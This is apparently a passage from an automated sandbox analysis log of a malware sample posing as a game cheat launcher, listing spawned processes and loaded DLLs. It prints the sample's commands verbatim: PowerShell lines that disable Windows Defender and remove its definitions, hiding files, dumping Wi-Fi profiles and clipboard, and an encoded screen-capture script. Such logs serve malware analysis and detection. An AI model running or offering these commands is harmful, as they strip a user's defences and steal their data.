    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDAF6.tmp" "c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentInto\fontsessionruntime.exe "C:\agentInto\fontsessionruntime.exe"
    Source: C:\agentInto\fontsessionruntime.exeProcess created: unknown unknown
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeSection loaded: slc.dllJump to behavior
